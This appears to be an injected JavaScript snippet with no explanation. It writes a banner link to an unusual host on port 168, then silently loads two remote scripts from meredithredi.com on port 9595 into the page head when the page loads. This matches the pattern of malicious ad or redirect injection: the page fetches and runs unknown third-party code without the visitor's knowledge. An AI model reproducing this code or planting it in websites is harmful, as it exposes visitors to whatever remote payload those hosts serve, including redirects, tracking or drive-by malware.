document.writeln("<style>.king{width:65%;padding-bottom:2px;height:100%;}@media screen and (max-width:600px){.king{width:100%;padding-bottom:2px;height:100%;}}</style>");
document.writeln("<a href=\'https://m.fisharrive.com:168/ua80512/\' target=\'_blank\' ><img src=\'https://www.xszxk.com/js/97.gif\' class=\'king\'></a>");
  var s = document.createElement('script');
    s.type = 'text/javascript';
    s.async = true;
    s.src = 'https://meredithredi.com:9595/impl/t105/s1926';
    var head = document.getElementsByTagName('head')[0];
    head.appendChild(s);
 var s = document.createElement('script');
    s.type = 'text/javascript';
    s.async = true;
    s.src = 'https://meredithredi.com:9595/impl/t104_150/s1926';
    var head = document.getElementsByTagName('head')[0];
    head.appendChild(s);
